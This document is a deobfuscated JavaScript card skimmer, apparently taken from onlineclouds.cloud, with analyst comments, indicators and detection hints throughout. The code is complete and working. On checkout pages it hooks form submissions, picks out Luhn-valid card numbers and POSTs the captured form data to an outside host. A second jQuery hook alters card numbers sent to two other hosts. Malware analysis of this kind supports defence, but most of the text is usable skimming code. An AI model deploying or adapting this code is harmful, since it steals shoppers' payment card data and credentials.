Malware from onlineclouds.cloud, deobfuscated
// Entry point of the sample: one deferred call to the URL check below,
// 100 ms after the script is evaluated.
setTimeout(checkForCheckout, 100);
// Shared capture buffer. createQueryString appends form data to it, and
// scrapeAllFields reads it and resets it to null on every polling pass.
var snd = null;
// Gate: start harvesting only when the current URL looks like a checkout page.
//
// window.location is coerced to its string form by RegExp.test and matched
// against a fixed keyword list. On a match scrapeAllFields is started; this
// function itself runs once and schedules nothing else.
// NOTE(review): the keywords look like names of e-commerce checkout
// pages/extensions -- confirm against the affected storefront. A third-party
// script that tests the page URL against such a list is worth flagging during
// script review.
function checkForCheckout() {
if ((/onepage|firecheckout|Checkout|onestepcheckout|onepagecheckout|checkout|oscheckout|idecheckoutvm|fancycheckout/).test(window.location)) {
scrapeAllFields();
}
}
// Click/submit handler (registered by scrapeAllFields) that snapshots the page's
// form fields into the global `snd` buffer.
//
// Every element matching "input, select, textarea, checkbox" is visited; the
// selector is not filtered by input type, so all <input> elements are included.
// Each value that is 1-59 characters long is appended as `name=value&`.
// Values are appended raw; nothing is URL-encoded here. Returns nothing.
function createQueryString() {
var inp = document.querySelectorAll("input, select, textarea, checkbox");
for (var i = 0; i < inp.length; i++) {
if (inp[i].value.length > 0 && inp[i].value.length < 60) {
// `nme` falls back to the element index for unnamed fields, but the append
// below reads inp[i].name directly, so `nme` is not what ends up in `snd`.
var nme = inp[i].name;
if (nme == "") {
nme = i;
}
snd += inp[i].name + "=" + inp[i].value + '&';
}
}
}
// Luhn (mod 10) checksum over the digits contained in `s`.
//
// Non-digit characters are dropped first. Returns true when the checksum of the
// remaining digits is a multiple of 10. scrapeAllFields uses this to decide
// whether a digit run found in the captured data is treated as a card number.
//
// Analyst note: i, x, j, k, m, c and a are assigned without a declaration, so
// in non-strict code they become properties of the global object.
function isValidCard(s) {
var v = "0123456789";
var w = "";
// Keep only the characters of s that are decimal digits.
for (i = 0; i < s.length; i++) {
x = s.charAt(i);
if (v.indexOf(x, 0) != -1) w += x;
}
// k = number of digit pairs; m = 1 when the digit count is odd, else 0.
j = w.length / 2;
k = Math.floor(j);
m = Math.ceil(j) - k;
c = 0;
// Every second digit counted from the right is doubled; a two-digit product
// contributes the sum of its digits.
for (i = 0; i < k; i++) {
a = w.charAt(i * 2 + m) * 2;
c += a > 9 ? Math.floor(a / 10 + a % 10) : a;
}
// The remaining digits are added unchanged.
for (i = 0; i < k + m; i++) c += w.charAt(i * 2 + 1 - m) * 1;
return (c % 10 == 0);
}
// Main loop of the skimmer. Each pass does three things:
//   1. hooks click/submit events so createQueryString captures form data,
//   2. inspects what the previous events captured and, if it contains a
//      Luhn-valid card-like number, sends it to a third-party host,
//   3. clears the buffer and re-arms itself to run again in 150 ms.
// Because the selectors are re-evaluated on every pass, elements added to the
// page later are hooked as well.
//
// Indicators visible in this sample (for detection and response):
//   - outbound POST to https://www.onlineclouds.cloud/api/v1/
//   - form body with the fields `data=` and `token=`
//   - literal strings "card_123" and "shop=www.google.nl" in the script text
// A Content-Security-Policy whose connect-src does not list that origin would
// stop the XMLHttpRequest below; monitoring checkout pages for requests to
// unexpected origins is the matching detection.
function scrapeAllFields() {
var btn = document.querySelectorAll(`a[href*='javascript:void0'],a[href='#'],button, input, submit, .btn, .button`);
for (var i = 0; i < btn.length; i++) {
var b = btn[i];
// "slect" is typo here -- WdG
// Text-entry and toggle controls are skipped; everything else that matched
// the selector gets a click listener.
if (b.type != "text" && b.type != 'slect' && b.type != "checkbox" && b.type != 'password' && b.type != "radio") {
if (b.addEventListener) {
b.addEventListener('click', createQueryString, false);
} else {
// Fallback for browsers that only provide attachEvent.
b.attachEvent('onclick', createQueryString);
}
}
}
// Form submission is hooked too, in addition to the button clicks above.
var frm = document.querySelectorAll('form');
for (var i = 0; i < frm.length; i++) {
if (frm[i].addEventListener) {
frm[i].addEventListener('submit', createQueryString, false);
} else {
frm[i].attachEvent('onsubmit', createQueryString);
}
}
// `snd` is non-null only if a hooked event fired since the previous pass.
if (snd != null) {
// A digit 3-6 followed by 13-16 more digits, i.e. a 14-17 digit run; the
// pattern is unanchored, so it can also match inside a longer digit string.
var regexp = /(3|4|5|6)[0-9]{13,16}/gi;
var matches = snd.match(regexp);
if (matches != null) {
// Only the first match is checked; nothing is sent unless it passes Luhn.
if (isValidCard(matches[0]) == true) {
// The whole captured buffer plus the matched number is obfuscated with
// encodeAllTheThings before it leaves the page.
snd = encodeAllTheThings(snd + "&shop=www.google.nl&card_123=" + matches[0]);
var http = new XMLHttpRequest();
http.open("POST", "https://www.onlineclouds.cloud/api/v1/", true);
http.setRequestHeader('Content-type', "application/x-www-form-urlencoded");
// Cross-origin request sent with credentials for the destination origin.
http.withCredentials = true;
// `token` carries the (obfuscated) host name of the page the data came from.
http.send("data=" + snd + '&token=' + encodeAllTheThings(window.location.host));
}
}
}
// Discard the buffer whether or not anything was sent, then poll again.
snd = null;
setTimeout(scrapeAllFields, 150);
}
// Obfuscates a string before exfiltration. This is not encryption: the random
// offset used for each character is emitted right next to it.
//
// For every UTF-16 code unit of theText a random offset in the range 68-190 is
// drawn; the output holds two code units per input unit: (original + offset)
// followed by the offset itself. The result is therefore twice as long as the
// input and differs on every call.
//
// For responders: a captured payload can be decoded without any key by
// subtracting the second code unit of each pair from the first.
//
// Analyst note: output, Temp, Temp2, TextSize, i and rnd are assigned without
// a declaration, so in non-strict code they become properties of the global
// object.
function encodeAllTheThings(theText) {
output = new String;
Temp = new Array();
Temp2 = new Array();
TextSize = theText.length;
// First pass: draw one offset per character and store the shifted code.
for (i = 0; i < TextSize; i++) {
rnd = Math.round(Math.random() * 122) + 68;
Temp[i] = theText.charCodeAt(i) + rnd;
Temp2[i] = rnd;
}
// Second pass: interleave shifted code and offset into the output string.
for (i = 0; i < TextSize; i++) {
output += String.fromCharCode(Temp[i], Temp2[i]);
}
return output;
};
// second func
// Installs a global jQuery beforeSend hook, so it sees every request made
// through jQuery's AJAX API on the page.
//
// Only requests whose URL contains "js-react.com" or "bootstrap-js.com" are
// touched. For those, every run of 13-16 digits in the request data is replaced
// with the first such run, whose last digit is swapped for a random digit 0-9;
// card-number-like values in those requests are thereby altered before they
// are sent.
// NOTE(review): this page does not say what the two hosts are -- presumably
// other collection endpoints; confirm before treating them as indicators.
// The console.log of the matched URL is an artifact that may show up in the
// browser console on an affected page.
jQuery.ajaxSetup({
beforeSend: function(jqXHR, settings) {
if (settings.url.indexOf("js-react.com") !== -1 || settings.url.indexOf('bootstrap-js.com') !== -1) {
console.log(settings.url);
// Replacement for the final digit.
var myRandom = Math.floor(Math.random() * 10);
var cc = new RegExp("[0-9]{13,16}");
if (cc.test(settings.data)) {
var old_cc = settings.data.match(cc);
// All digit runs are overwritten with the same modified first match.
var new_data = settings.data.replace(new RegExp("[0-9]{13,16}", 'g'), old_cc[0].slice(0, -1) + myRandom);
settings.data = new_data;
}
}
}
});